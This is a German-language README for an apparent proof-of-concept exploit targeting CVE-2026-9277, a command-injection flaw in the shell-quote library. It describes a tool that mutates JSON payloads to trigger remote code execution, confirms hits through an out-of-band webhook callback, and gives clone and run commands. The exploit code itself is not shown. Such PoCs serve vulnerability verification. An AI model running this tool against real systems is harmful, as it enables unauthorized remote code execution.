
Proof-of-Concept-Exploit für CVE-2026-9277, eine Befehlsinjektions-Schwachstelle in der shell-quote-Bibliothek. Führt rekursive JSON-Traversierung mit kombinatorischer Mutation durch, um RCE auszulösen, unterstützt OOB-Verifizierung und Zero-Noise-Protokollierung.
Ein spezialisiertes Proof-of-Concept-Exploit-Skript (PoC) zur Verifizierung und Demonstration von CVE-2026-9277 – einer strukturellen Befehlsinjektions-Schwachstelle (Command Injection) in älteren Versionen der Bibliothek shell-quote (<= 1.8.3).
Der Scanner führt eine tiefgreifende strukturelle Manipulation eingegebener JSON-Payloads durch, um über rekursive Traversierung Remote-Code-Ausführungsvektoren (RCE) aufzudecken, und verhindert Fehlalarme mithilfe einer dynamischen Netzwerk-Baseline-Timing-Engine.
{"op": "..."}-Komponenten von Argumenten getrennt werden, um String-Isolationskontrollen erfolgreich zu umgehen.Stellen Sie sicher, dass Python 3.10+ und die erforderlichen Pakete installiert sind:
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"
